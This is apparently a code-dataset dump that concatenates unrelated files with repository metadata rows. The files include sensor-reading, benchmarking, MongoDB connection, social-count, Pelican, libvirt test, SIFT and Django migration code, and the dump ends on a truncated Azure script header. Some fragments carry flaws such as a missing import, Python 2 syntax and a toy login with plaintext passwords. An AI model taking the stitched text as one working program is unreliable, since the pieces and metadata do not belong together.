print "gyro_zout: ", gyro_zout, " scaled: ", (gyro_zout / 131)
# print
# print "accelerometer data"
# print "------------------"
accel_xout = read_word_2c(0x3b)
accel_yout = read_word_2c(0x3d)
accel_zout = read_word_2c(0x3f)
accel_xout_scaled = accel_xout / 16384.0
accel_yout_scaled = accel_yout / 16384.0
accel_zout_scaled = accel_zout / 16384.0
# print "accel_xout: ", accel_xout, " scaled: ", accel_xout_scaled
# print "accel_yout: ", accel_yout, " scaled: ", accel_yout_scaled
# print "accel_zout: ", accel_zout, " scaled: ", accel_zout_scaled
# print "x rotation: " , get_x_rotation(accel_xout_scaled, accel_yout_scaled, accel_zout_scaled)
# print "y rotation: " , get_y_rotation(accel_xout_scaled, accel_yout_scaled, accel_zout_scaled)
|
mit
| 6,383,770,058,486,674,000
| 27.22549
| 97
| 0.674192
| false
| 2.67814
| false
| false
| false
|
ActiveState/code
|
recipes/Python/440657_Determine_functiexecutitime_Pythonic/recipe-440657.py
|
1
|
2051
|
"""
Determine function execution time.
>>> def f():
... return sum(range(10))
...
>>> pytime(f)
(Time to execute function f, including function call overhead).
>>> 1.0/pytime(f)
(Function calls/sec, including function call overhead).
>>> 1.0/pytime_statement('sum(range(10))')
(Statements/sec, does not include any function call overhead).
"""
import sys
# Source code is public domain.
if sys.platform == "win32":
from time import clock
else:
from time import time as clock
def pytime(f, args=(), kwargs={}, Tmax=2.0):
"""
Calls f many times to determine the average time to execute f.
Tmax is the maximum time to spend in pytime(), in seconds.
"""
count = 1
while True:
start = clock()
if args == () and kwargs == {}:
for i in xrange(count):
f()
elif kwargs == {}:
for i in xrange(count):
f(*args)
else:
for i in xrange(count):
f(*args, **kwargs)
T = clock() - start
if T >= Tmax/4.0: break
count *= 2
return T / count
def pytime_statement(stmt, global_dict=None, Tmax=2.0,
repeat_count=128):
"""
Determine time to execute statement (or block) of Python code.
Here global_dict is the globals dict used for exec, Tmax is the max
time to spend in pytime_statement(), in sec, and repeat_count is the
number of times to paste stmt into the inner timing loop (this is
automatically set to 1 if stmt takes too long).
"""
if global_dict is None:
global_dict = globals()
ns = {}
code = 'def timed_func():' + ('\n' +
'\n'.join([' '+x for x in stmt.split('\n')]))
exec code in global_dict, ns
start = clock()
ns['timed_func']()
T = clock() - start
if T >= Tmax/4.0:
return T
elif T >= Tmax/4.0/repeat_count:
return pytime(ns['timed_func'], (), {}, Tmax-T)
else:
code = 'def timed_func():' + ('\n' +
'\n'.join([' '+x for x in stmt.split('\n')]))*repeat_count
exec code in global_dict, ns
return pytime(ns['timed_func'], (), {}, Tmax-T) / repeat_count
|
mit
| -7,438,097,726,899,165,000
| 25.294872
| 70
| 0.601658
| false
| 3.401327
| false
| false
| false
|
jucacrispim/mongomotor
|
mongomotor/connection.py
|
1
|
3842
|
# -*- coding: utf-8 -*-
# Copyright 2016 Juca Crispim <juca@poraodojuca.net>
# This file is part of mongomotor.
# mongomotor is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# mongomotor is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with mongomotor. If not, see <http://www.gnu.org/licenses/>.
from mongoengine import connection
from mongoengine.connection import (connect as me_connect,
DEFAULT_CONNECTION_NAME,
disconnect as me_disconnect,
register_connection,
get_connection)
from mongomotor import utils
from mongomotor.clients import (MongoMotorAsyncIOClient,
MongoMotorTornadoClient)
from mongomotor.monkey import MonkeyPatcher
CLIENTS = {'asyncio': (MongoMotorAsyncIOClient,),
'tornado': (MongoMotorTornadoClient,)}
_db_version = {}
def get_mongodb_version(alias=DEFAULT_CONNECTION_NAME):
"""Return the version of the connected mongoDB (first 2 digits)
:param alias: The alias identifying the connection
:return: tuple(int, int)
"""
# e.g: (3, 2)
version_list = get_connection(alias).server_info()["versionArray"][:2]
return tuple(version_list)
def get_db_version(alias=DEFAULT_CONNECTION_NAME):
"""Returns the version of the database for a given alias. This
will patch the original mongoengine's get_mongodb_version.
:param alias: The alias identifying the connection.
"""
return _db_version[alias]
def connect(db=None, async_framework='asyncio',
alias=DEFAULT_CONNECTION_NAME, **kwargs):
"""Connect to the database specified by the 'db' argument.
Connection settings may be provided here as well if the database is not
running on the default port on localhost. If authentication is needed,
provide username and password arguments as well.
Multiple databases are supported by using aliases. Provide a separate
`alias` to connect to a different instance of :program:`mongod`.
Parameters are the same as for :func:`mongoengine.connection.connect`
plus one:
:param async_framework: Which asynchronous framework should be used.
It can be `tornado` or `asyncio`. Defaults to `asyncio`.
"""
clients = CLIENTS[async_framework]
with MonkeyPatcher() as patcher:
patcher.patch_db_clients(*clients)
patcher.patch_sync_connections()
ret = me_connect(db=db, alias=alias, **kwargs)
# here we register a connection that will use the original pymongo
# client and if used will block the process.
# We need to patch here otherwise we will get the async connection
# beeing reused instead of a sync one.
with MonkeyPatcher() as patcher:
patcher.patch_item(connection, '_find_existing_connection',
lambda *a, **kw: None)
kwargs.pop('io_loop', None)
sync_alias = utils.get_sync_alias(alias)
register_connection(sync_alias, db, **kwargs)
_db_version[alias] = get_mongodb_version(sync_alias)
return ret
def disconnect(alias=DEFAULT_CONNECTION_NAME):
"""Disconnects from the database indentified by ``alias``.
"""
me_disconnect(alias=alias)
# disconneting sync connection
sync_alias = utils.get_sync_alias(alias)
me_disconnect(alias=sync_alias)
|
gpl-3.0
| 4,309,757,562,831,834,600
| 34.906542
| 75
| 0.682457
| false
| 4.176087
| false
| false
| false
|
thinkxl/mentions
|
mentions/mentions.py
|
1
|
3175
|
# -*- coding: utf-8 -*-
"""
This module contains the primary objects that power Mention.
"""
import json
import requests
from bs4 import BeautifulSoup
headers = {'User-Agent': 'Karma v0.1.0', 'From': '@thinkxl'}
# Facebook
def get_facebook_data(method, url):
try:
facebook_url = 'https://api.facebook.com/method/fql.query?query=select \
' + method + ' from link_stat where url="' + url + '"&format=json'
r = requests.get(facebook_url, headers=headers)
json_data = json.loads(r.text)
return json_data[0][method]
except:
return 0
def facebook_total_count(url):
return get_facebook_data('total_count', url)
def facebook_like_count(url):
return get_facebook_data('like_count', url)
def facebook_comment_count(url):
return get_facebook_data('comment_count', url)
def facebook_share_count(url):
return get_facebook_data('share_count', url)
# Twitter
def tweets(url):
"""tweets count"""
try:
twitter_url = 'http://urls.api.twitter.com/1/urls/count.json?url=' + url
r = requests.get(twitter_url, headers=headers)
json_data = json.loads(r.text)
return json_data['count']
except:
return 0
# Google+
def google_plus_one(url):
"""+1's count"""
try:
google_url = 'https://plusone.google.com/_/+1/fastbutton?url=' + url
soup = BeautifulSoup(requests.get(google_url, headers=headers).text)
tag = soup.find_all(id="aggregateCount")[0]
count = tag.string.extract()
return count
except:
return 0
def linkedin_mentions(url):
"""mentions count"""
try:
linkedin_url = 'http://www.linkedin.com/countserv/count/share?url=' \
+ url + '&format=json'
json_data = json.loads(requests.get(linkedin_url, headers=headers).text)
return json_data['count']
except:
return 0
def pinterest_shares(url):
"""pinterest share count"""
try:
pinterest_url = 'http://api.pinterest.com/v1/urls/count.json?url=' \
+ url
response = requests.get(pinterest_url).text\
.replace('receiveCount(', '')\
.replace(')', '')
json_data = json.loads(response)
return json_data['count']
except:
return 0
def stumbleupon_views(url):
"""views count"""
try:
stumbleupon_url = 'http://www.stumbleupon.com/services/1.01/badge.getinfo?\
url=' + url + '&format=jsonp'
json_data = json.loads(requests.get(stumbleupon_url).text)
return json_data['result']['views']
except:
return 0
# def delicious_count(url):
# """bookmarked count"""
# delicious_url = 'http://feeds.delicious.com/v2/json/urlinfo/data?url='\
# + url
# return requests.get(delicious_url).response
def reddit_mentions(url):
"""mentions count"""
try:
reddit_url = 'http://www.reddit.com/api/info.json?url=' + url
json_data = json.loads(requests.get(reddit_url, headers=headers).text)
return len(json_data['data']['children'])
except:
return 0
|
mit
| 7,374,464,425,110,252,000
| 29.238095
| 83
| 0.596535
| false
| 3.410311
| false
| false
| false
|
kpolimis/kpolimis.github.io-src
|
pelicanconf.py
|
1
|
3979
|
#!/usr/bin/env python
# -*- coding: utf-8 -*- #
from __future__ import unicode_literals
import os
#from utils import filters
AUTHOR = u'Kivan Polimis'
SITENAME = u'Kivan Polimis'
# SITESUBTITLE = u'my personal musings and attempts to apply \
# and share some programming tips'
INDEX_SAVE_AS = 'pages/home.html'
PATH = 'content'
PAGE_ORDER_BY = 'sortorder'
# Times and dates
TIMEZONE = 'US/Pacific'
DEFAULT_LANG = u'en'
SUMMARY_MAX_LENGTH = '50'
GOOGLE_ANALYTICS = 'UA-104881568-1'
# Set the article URL
#ARTICLE_URL = 'blog/{date:%Y}/{date:%m}/{date:%d}/{slug}/'
#ARTICLE_SAVE_AS = 'blog/{date:%Y}/{date:%m}/{date:%d}/{slug}/index.html'
# Theme and plugins
# JINJA_FILTERS = {'sidebar': filters.sidebar}
THEME = "pelican-themes/nest"
# Minified CSS
NEST_CSS_MINIFY = True
# Add canonical link element to top page header and all article/author/category/tag page header
NEST_REL_CANONICAL_LINK = True
NEST_HEADER_IMAGES = ''
NEST_HEADER_LOGO = '/images/jade_mountain.png'
DISPLAY_PAGES_ON_MENU = False
# MENUITEMS = [('Home', '/index.html'), ('Articles', '/categories.html')]
MENUITEMS = [('Home', '/index.html'),('Articles','/categories.html'),
('Vita','/pages/vita.html'), ('Software','/pages/software.html'),
('Projects','/pages/projects.html')]
# categories.html
NEST_CATEGORIES_HEAD_TITLE = u'Articles'
NEST_CATEGORIES_HEAD_DESCRIPTION = u'Articles listed by category'
NEST_CATEGORIES_HEADER_TITLE = u'Articles'
NEST_CATEGORIES_HEADER_SUBTITLE = u'Articles listed by category'
# software.html
NEST_SOFTWARE_HEAD_TITLE = u'Software'
NEST_SOFTWARE_HEAD_DESCRIPTION = u'Software'
NEST_SOFTWARE_HEADER_TITLE = u'Software'
NEST_SOFTWARE_HEADER_SUBTITLE = u'Articles listed by category'
# Footer
NEST_SITEMAP_COLUMN_TITLE = u'Sitemap'
NEST_SITEMAP_MENU = [('Home', '/index.html'),('Articles','/categories.html'),
('Vita','/pages/vita.html'), ('Software','/pages/software.html'),
('Projects','/pages/projects.html')]
NEST_SITEMAP_ATOM_LINK = u'Atom Feed'
NEST_SITEMAP_RSS_LINK = u'RSS Feed'
NEST_SOCIAL_COLUMN_TITLE = u'Social'
NEST_LINKS_COLUMN_TITLE = u'Links'
NEST_COPYRIGHT = u'© Kivan Polimis 2021'
# pagination.html
NEST_PAGINATION_PREVIOUS = u'Previous'
NEST_PAGINATION_NEXT = u'Next'
# Footer optional
NEST_FOOTER_HTML = ''
# Static files
STATIC_PATHS = ['images', 'favicon.ico']
CODE_DIR = 'downloads/code'
NOTEBOOK_DIR = 'downloads/notebooks'
READERS = {'html': None}
PLUGIN_PATHS = ['pelican-plugins']
PLUGINS = ['liquid_tags.notebook', # for embedding notebooks
'summary', # auto-summarizing articles
'feed_summary', # use summaries for RSS, not full articles
'render_math'
]
MD = ['codehilite(css_class=highlight)','extra', 'mathjax']
# Only use LaTeX for selected articles
LATEX = 'article'
# SUMMARY_USE_FIRST_PARAGRAPH = 'True'
TWITTER_USERNAME = 'kpolimis'
GITHUB_USERNAME = 'kpolimis'
AUTHOR_CV = "http://kivanpolimis.com/docs/Kivan_Polimis_Curriculum_Vitae.pdf"
SHOW_ARCHIVES = True
IGNORE_FILES = ['.ipynb_checkpoints']
if not os.path.exists('_nb_header.html'):
import warnings
warnings.warn("_nb_header.html not found. "
"Rerun make html to finalize build.")
else:
EXTRA_HEADER = open('_nb_header.html').read()
# RMD_READER_KNITR_OPTS_CHUNK = {'fig.path': '../../../figure/'}
# Feed generation is usually not desired when developing
FEED_ALL_ATOM = None
CATEGORY_FEED_ATOM = None
TRANSLATION_FEED_ATOM = None
AUTHOR_FEED_ATOM = None
AUTHOR_FEED_RSS = None
# Title menu options
DEFAULT_PAGINATION = 10
# Uncomment following line if you want document-relative URLs when developing
RELATIVE_URLS = True
# Blogroll
#LINKS = (('Pelican', 'http://getpelican.com/'),
# ('Python.org', 'http://python.org/'),
# ('Jinja2', 'http://jinja.pocoo.org/'),
# ('You can modify those links in your config file', '#'),)
# Social widget
#SOCIAL = (('You can add links in your config file', '#'),
# ('Another social link', '#'),)
|
gpl-3.0
| 2,233,683,985,221,732,400
| 28.474074
| 95
| 0.688615
| false
| 2.923586
| false
| false
| false
|
libvirt/libvirt-test-API
|
libvirttestapi/repos/storage/dir_vol_upload.py
|
1
|
5210
|
# Copyright (C) 2010-2012 Red Hat, Inc.
# This work is licensed under the GNU GPLv2 or later.
# dir storage volume upload testing, only raw format volume is
# supported, other format might fail. offset and length can
# only be chosen in 0 and 1048576.
import os
import string
import sys
from xml.dom import minidom
from libvirt import libvirtError
from libvirttestapi.src import sharedmod
from libvirttestapi.utils import utils
required_params = ('poolname', 'volname', 'volformat', 'capacity',
'offset', 'length',)
optional_params = {'xml': 'xmls/dir_volume.xml',
}
def get_pool_path(poolobj):
""" get pool xml description
"""
poolxml = poolobj.XMLDesc(0)
logger.debug("the xml description of pool is %s" % poolxml)
doc = minidom.parseString(poolxml)
path_element = doc.getElementsByTagName('path')[0]
textnode = path_element.childNodes[0]
path_value = textnode.data
return path_value
def write_file(path):
"""write 1M test data to file
"""
logger.info("write data into file %s" % path)
f = open(path, 'w')
if sys.version_info[0] < 3:
datastr = ''.join(string.lowercase + string.uppercase +
string.digits + '.' + '\n')
else:
datastr = ''.join(string.ascii_lowercase + string.ascii_uppercase +
string.digits + '.' + '\n')
data = ''.join(16384 * datastr)
f.write(data)
f.close()
def handler(stream, data, file_):
return file_.read(data)
def dir_vol_upload(params):
"""test volume download and check"""
global logger
logger = params['logger']
poolname = params['poolname']
volname = params['volname']
volformat = params['volformat']
offset = int(params['offset'])
length = int(params['length'])
capacity = params['capacity']
xmlstr = params['xml']
logger.info("the poolname is %s, volname is %s, volformat is %s" %
(poolname, volname, volformat))
logger.info("upload offset is: %s" % offset)
logger.info("the data length to upload is: %s" % length)
conn = sharedmod.libvirtobj['conn']
try:
poolobj = conn.storagePoolLookupByName(poolname)
path_value = get_pool_path(poolobj)
volume_path = path_value + "/" + volname
xmlstr = xmlstr.replace('VOLPATH', volume_path)
xmlstr = xmlstr.replace('SUFFIX', capacity[-1])
xmlstr = xmlstr.replace('CAP', capacity[:-1])
logger.debug("volume xml:\n%s" % xmlstr)
logger.info("create %s %s volume" % (volname, volformat))
vol = poolobj.createXML(xmlstr, 0)
test_path = path_value + "/" + "vol_test"
write_file(test_path)
olddigest = utils.digest(test_path, 0, 0)
logger.debug("the old file digest is: %s" % olddigest)
if offset:
origdigestpre = utils.digest(volume_path, 0, offset)
else:
origdigestpre = ''
logger.debug("the original pre region digest is: %s" % origdigestpre)
origdigestpost = utils.digest(volume_path, offset + 1024 * 1024, 0)
logger.debug("the original post region digest is: %s" % origdigestpost)
st = conn.newStream(0)
if sys.version_info[0] < 3:
f = open(test_path, 'r')
else:
f = open(test_path, 'rb')
logger.info("start upload")
vol.upload(st, offset, length, 0)
logger.info("sent all data")
st.sendAll(handler, f)
logger.info("finished stream")
st.finish()
f.close()
newdigest = utils.digest(volume_path, offset, 1024 * 1024)
logger.debug("the new file digest is: %s" % olddigest)
if offset:
newdigestpre = utils.digest(volume_path, 0, offset)
else:
newdigestpre = ''
logger.debug("the new pre region digest is: %s" % origdigestpre)
newdigestpost = utils.digest(volume_path, offset + 1024 * 1024, 0)
logger.debug("the new post region digest is: %s" % origdigestpost)
if newdigestpre == origdigestpre:
logger.info("file pre region digests match")
else:
logger.error("file pre region digests not match")
return 1
if olddigest == newdigest:
logger.info("file digests match")
else:
logger.error("file digests not match")
return 1
if newdigestpost == origdigestpost:
logger.info("file post region digests match")
else:
logger.error("file post region digests not match")
return 1
except libvirtError as e:
logger.error("libvirt call failed: " + str(e))
return 1
return 0
def dir_vol_upload_clean(params):
"""clean testing environment"""
poolname = params['poolname']
volname = params['volname']
conn = sharedmod.libvirtobj['conn']
poolobj = conn.storagePoolLookupByName(poolname)
path_value = get_pool_path(poolobj)
test_path = path_value + "/" + "vol_test"
vol = poolobj.storageVolLookupByName(volname)
vol.delete(0)
if os.path.exists(test_path):
os.unlink(test_path)
return 0
|
gpl-2.0
| 4,381,108,374,907,106,000
| 29.647059
| 79
| 0.605758
| false
| 3.681979
| true
| false
| false
|
olingrobin/test
|
day1/user.py
|
1
|
1087
|
error_name = open("namefile.txt","a")
error_name.close()
list = {"jin":"123","tom":"456","jak":"789","aimi":"012"}
count = 0
status = False
while True:
    user_name = input("Please enter username: ")
error_name = open("namefile.txt","r")
for name in error_name:
if user_name == name.strip():
status = True
break
if status == True:
error_name.close()
print("用户已被禁止登陆")
break
    user_password = input("Please enter password: ")
for k,v in list.items():
        if user_name == k and user_password == v:
            print("Welcome, user:",k)
status = True
break
else:
continue
if status == True:
break
count += 1
if count < 3:
print("请检查用户名或密码:")
continue
if count >= 3:
print("输入错误三次,用户",user_name,"已进入黑名单")
error_user = open("namefile.txt","a")
error_user.write(user_name)
error_user.write("\n")
error_user.close()
break
|
gpl-3.0
| -9,159,499,533,204,680,000
| 22.642857
| 57
| 0.512588
| false
| 3.152381
| false
| false
| false
|
DeveloperJose/Vision-Rat-Brain
|
feature_matching_v3/util_sift.py
|
1
|
1540
|
# Author: Jose G Perez
# Version 1.0
# Last Modified: January 31, 2018
import numpy as np
import cv2
import os
SIFT = cv2.xfeatures2d.SIFT_create(contrastThreshold=0.05, edgeThreshold=100, sigma=2)
def kp_to_array(kp):
array = np.zeros((len(kp), 7), dtype=np.float32)
for idx in range(array.shape[0]):
k = kp[idx]
array[idx] = np.array([k.pt[0], k.pt[1], k.size,k.angle,k.response,k.octave,k.class_id])
return array
def array_to_kp(array):
kp = []
for idx in range(array.shape[0]):
k = array[idx]
kp.append(cv2.KeyPoint(k[0],k[1],k[2],k[3],k[4],k[5],k[6]))
return kp
def __precompute_atlas(name):
if not os.path.isfile(name + '_SIFT.npz'):
print('Precomputing SIFT for ', name)
atlas_data = np.load(name + ".npz")
atlas_im = atlas_data['images']
atlas_labels = atlas_data['labels']
atlas_kp = []
atlas_des = []
for i in range(0, atlas_im.shape[0]):
kp, des = SIFT.detectAndCompute(atlas_im[i], None)
kp = kp_to_array(kp)
atlas_kp.append(kp)
atlas_des.append(des)
atlas_kp = np.asarray(atlas_kp)
atlas_des = np.asarray(atlas_des)
np.savez_compressed(name + '_SIFT', images=atlas_im, labels=atlas_labels, kp=atlas_kp, des=atlas_des)
def precompute_sift(S_NAME, PW_NAME):
__precompute_atlas(S_NAME)
__precompute_atlas(PW_NAME)
def load_sift(path):
data = np.load(path)
return data['images'], data['labels'], data['kp'], data['des']
|
mit
| -6,412,502,763,211,562,000
| 30.44898
| 109
| 0.597403
| false
| 2.745098
| false
| false
| false
|
wd8rde/genesis_g59_py
|
setup.py
|
1
|
1416
|
#!/usr/bin/env python
#The MIT License (MIT)
#
#Copyright (c) 2015 Robert Anthony Bouterse, WD8RDE
#
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
from distutils.core import setup
setup(name='genesis_g59',
version='0.1',
description='Genesis G59 USB Control Utilities',
author='WD8RDE',
author_email='wd8rde@gmail.com',
url='',
packages=['genesis_g59','genesis_g59.g59_si570'],
)
|
mit
| -5,464,127,228,988,461,000
| 43.25
| 79
| 0.75565
| false
| 3.933333
| false
| false
| false
|
Dangetsu/vnr
|
Frameworks/Sakura/py/libs/vnragent/engine.py
|
1
|
2147
|
# coding: utf8
# engine.py
# 5/3/2014 jichi
# The logic in this file must be consistent with that in vnragent.dll.
if __name__ == '__main__': # DEBUG
import sys
sys.path.append("..")
import os
from glob import glob
from sakurakit.skdebug import dprint
from sakurakit.skfileio import escapeglob
from sakurakit import skwin  # provides get_process_path(), used in EngineFinder below
class Engine:
def __init__(self, name='', regionLocked=False, vnrboot=False, **kwargs):
self.name = name # str
self.regionLocked = regionLocked # bool
self.vnrboot = vnrboot # bool
# Not used
#def encoding(self): return 'utf-16' if self.wideChar else 'shift-jis'
class EngineFinder:
def __init__(self, pid=0, exepath='', dirpath=''):
"""
@param* pid long process id
@param* exepath unicode executable path
@param* dirpath unicode process directory path
"""
if not exepath and pid:
exepath = skwin.get_process_path(pid)
if not dirpath and exepath:
dirpath = os.path.dirname(exepath)
self.pid = pid # long
self.exepath = exepath # unicode
self.dirpath = dirpath # unicode
#self.processName = skwin.get_process_name(pid)
def eval(self, e):
"""
@param e list or str
@return bool
"""
if not e:
return False
if isinstance(e, list):
for it in e:
if not self.eval(it):
return False
return True
# e is str or unicode
elif '|' in e:
for it in e.split('|'):
if self.eval(it):
return True
return False
elif e[0] == '!' and len(e) > 1:
return not self.eval(e[1:])
elif '*' in e:
return self.globs(e)
else:
return self.exists(e)
def globs(self, relpath):
"""
@param relpath unicode
@return bool
"""
return bool(self.dirpath and glob(os.path.join(escapeglob(self.dirpath), relpath)))
def exists(self, relpath):
"""
@param relpath unicode
@return bool
"""
return bool(self.dirpath) and os.path.exists(os.path.join(self.dirpath, relpath))
def getAbsPath(self, relpath):
"""
@param relpath unicode
@return unicode
"""
return os.path.join(self.dirpath, relpath)
# EOF
|
gpl-3.0
| -3,036,005,952,833,670,000
| 23.965116
| 87
| 0.615277
| false
| 3.413355
| false
| false
| false
|
gmimano/commcaretest
|
corehq/apps/reports/filters/select.py
|
1
|
5848
|
import datetime
import calendar
from django.conf import settings
from django.utils.translation import ugettext_noop
from django.utils.translation import ugettext as _
from casexml.apps.case.models import CommCareCase, CommCareCaseGroup
from corehq.apps.app_manager.models import Application
from corehq.apps.domain.models import Domain, LICENSES
from corehq.apps.groups.models import Group
from corehq.apps.orgs.models import Organization
from corehq.apps.reports.filters.base import BaseSingleOptionFilter, BaseMultipleOptionFilter
class SelectRegionFilter(BaseSingleOptionFilter):
slug = "region"
label = ugettext_noop("Region")
default_text = ugettext_noop("All Regions")
@property
def options(self):
if hasattr(Domain, 'regions'):
available_regions = [(d.replace(' ', '+'), d) for d in Domain.regions()]
else:
available_regions = []
return available_regions
class SelectLicenseFilter(BaseSingleOptionFilter):
slug = "license"
label = ugettext_noop("License")
default_text = ugettext_noop("All Licenses")
@property
def options(self):
return [(code, license_name) for code, license_name in LICENSES.items()]
class SelectCategoryFilter(BaseSingleOptionFilter):
slug = "category"
label = ugettext_noop("Category")
default_text = ugettext_noop("All Categories")
@property
def options(self):
if hasattr(Domain, 'categories'):
available_categories = [(d.replace(' ', '+'), d) for d in Domain.categories()]
else:
available_categories = []
return available_categories
class SelectOrganizationFilter(BaseSingleOptionFilter):
slug = "org"
label = ugettext_noop("Organization")
default_text = ugettext_noop("All Organizations")
@property
def options(self):
return [(o.name, o.title) for o in Organization.get_all()]
class GroupFilterMixin(object):
slug = "group"
label = ugettext_noop("Group")
default_text = ugettext_noop("Everybody")
@property
def options(self):
return [(group.get_id, group.name) for group in Group.get_reporting_groups(self.domain)]
class GroupFilter(GroupFilterMixin, BaseSingleOptionFilter):
placeholder = ugettext_noop('Click to select a group')
class MultiGroupFilter(GroupFilterMixin, BaseMultipleOptionFilter):
placeholder = ugettext_noop('Click to select groups')
class YearFilter(BaseSingleOptionFilter):
slug = "year"
label = ugettext_noop("Year")
default_text = None
@property
def options(self):
start_year = getattr(settings, 'START_YEAR', 2008)
years = [(unicode(y), y) for y in range(start_year, datetime.datetime.utcnow().year + 1)]
years.reverse()
return years
class MonthFilter(BaseSingleOptionFilter):
slug = "month"
label = ugettext_noop("Month")
default_text = None
@property
def options(self):
return [("%02d" % m, calendar.month_name[m]) for m in range(1, 13)]
class CaseTypeFilter(BaseSingleOptionFilter):
slug = "case_type"
label = ugettext_noop("Case Type")
default_text = ugettext_noop("All Case Types")
@property
def options(self):
case_types = self.get_case_types(self.domain)
return [(case, "%s" % case) for case in case_types]
@classmethod
def get_case_types(cls, domain):
key = [domain]
for r in CommCareCase.get_db().view(
'hqcase/all_cases',
startkey=key,
endkey=key + [{}],
group_level=2
).all():
_, case_type = r['key']
if case_type:
yield case_type
@classmethod
def get_case_counts(cls, domain, case_type=None, user_ids=None):
"""
Returns open count, all count
"""
user_ids = user_ids or [{}]
for view_name in ('hqcase/open_cases', 'hqcase/all_cases'):
def individual_counts():
for user_id in user_ids:
key = [domain, case_type or {}, user_id]
try:
yield CommCareCase.get_db().view(
view_name,
startkey=key,
endkey=key + [{}],
group_level=0
).one()['value']
except TypeError:
yield 0
yield sum(individual_counts())
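    # Usage sketch (hypothetical domain name): the generator yields the open
    # count followed by the total count, so callers can unpack it directly:
    #   open_count, total_count = CaseTypeFilter.get_case_counts('my-domain')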
class SelectOpenCloseFilter(BaseSingleOptionFilter):
slug = "is_open"
label = ugettext_noop("Opened / Closed")
default_text = ugettext_noop("Show All")
@property
def options(self):
return [
('open', _("Only Open")),
('closed', _("Only Closed")),
]
class SelectApplicationFilter(BaseSingleOptionFilter):
slug = "app"
label = ugettext_noop("Application")
default_text = ugettext_noop("Select Application [Latest Build Version]")
@property
def options(self):
apps_for_domain = Application.get_db().view(
"app_manager/applications_brief",
startkey=[self.domain],
endkey=[self.domain, {}],
include_docs=True
).all()
return [(app['value']['_id'], _("%(name)s [up to build %(version)s]") % {
'name': app['value']['name'],
'version': app['value']['version']}) for app in apps_for_domain]
class MultiCaseGroupFilter(BaseMultipleOptionFilter):
slug = "case_group"
label = ugettext_noop("Case Group")
default_text = ugettext_noop("All Case Groups")
placeholder = ugettext_noop('Click to select case groups')
@property
def options(self):
return [(g["id"], g["key"][1]) for g in CommCareCaseGroup.get_all(self.domain, include_docs=False)]
|
bsd-3-clause
| 2,471,994,198,075,688,000
| 31.131868
| 107
| 0.612859
| false
| 4.075261
| false
| false
| false
|
django-erp/django-erp
|
djangoerp/menus/migrations/0002_initial_fixture.py
|
1
|
3421
|
from django.db import models, migrations
from django.utils.translation import ugettext_noop as _
from django.urls import reverse
from ..utils import create_detail_actions, create_detail_navigation
def install(apps, schema_editor):
# Models.
User = apps.get_model('core.User')
Group = apps.get_model('core.Group')
Permission = apps.get_model('core.Permission')
Menu = apps.get_model('menus.Menu')
Link = apps.get_model('menus.Link')
# Instances.
users_group, is_new = Group.objects.get_or_create(name="users")
add_bookmark, is_new = Permission.objects.get_or_create_by_natural_key("add_link", "menus", "Link")
edit_user, is_new = Permission.objects.get_or_create_by_natural_key("change_user", "core", "User")
delete_user, is_new = Permission.objects.get_or_create_by_natural_key("delete_user", "core", "User")
# Menus.
main_menu, is_new = Menu.objects.get_or_create(
slug="main",
description=_("Main menu")
)
user_area_not_logged_menu, is_new = Menu.objects.get_or_create(
slug="user_area_not_logged",
description=_("User area for anonymous users")
)
user_area_logged_menu, is_new = Menu.objects.get_or_create(
slug="user_area_logged",
description=_("User area for logged users")
)
user_detail_actions, is_new = create_detail_actions(User)
user_detail_navigation, is_new = create_detail_navigation(User)
# Links.
my_dashboard_link, is_new = Link.objects.get_or_create(
menu_id=main_menu.pk,
title=_("My Dashboard"),
slug="my-dashboard",
description=_("Go back to your dashboard"),
url="/"
)
login_link, is_new = Link.objects.get_or_create(
title=_("Login"),
slug="login",
description=_("Login"),
url=reverse("user_login"),
only_authenticated=False,
menu_id=user_area_not_logged_menu.pk
)
administration_link, is_new = Link.objects.get_or_create(
title=_("Administration"),
slug="administration",
description=_("Administration panel"),
url="/admin/",
only_staff=True,
menu_id=user_area_logged_menu.pk
)
logout_link, is_new = Link.objects.get_or_create(
title=_("Logout"),
slug="logout",
description=_("Logout"),
url=reverse("user_logout"),
menu_id=user_area_logged_menu.pk
)
user_edit_link, is_new = Link.objects.get_or_create(
title=_("Edit"),
slug="user-edit",
description=_("Edit"),
url="user_edit",
context='{"pk": "object.pk"}',
menu_id=user_detail_actions.pk
)
user_edit_link.only_with_perms.set([edit_user])
user_delete_link, is_new = Link.objects.get_or_create(
title=_("Delete"),
slug="user-delete",
description=_("Delete"),
url="user_delete",
context='{"pk": "object.pk"}',
menu_id=user_detail_actions.pk
)
user_delete_link.only_with_perms.set([delete_user])
# Permissions.
users_group.permissions.add(add_bookmark)
class Migration(migrations.Migration):
dependencies = [
('menus', '0001_initial'),
('contenttypes', '0002_remove_content_type_name'),
('core', '0002_initial_fixture'),
]
operations = [
migrations.RunPython(install),
]
|
mit
| -8,335,009,606,325,166,000
| 30.1
| 104
| 0.602455
| false
| 3.604847
| false
| false
| false
|
DazWorrall/ansible
|
contrib/inventory/azure_rm.py
|
1
|
32749
|
#!/usr/bin/env python
#
# Copyright (c) 2016 Matt Davis, <mdavis@ansible.com>
# Chris Houseknecht, <house@redhat.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
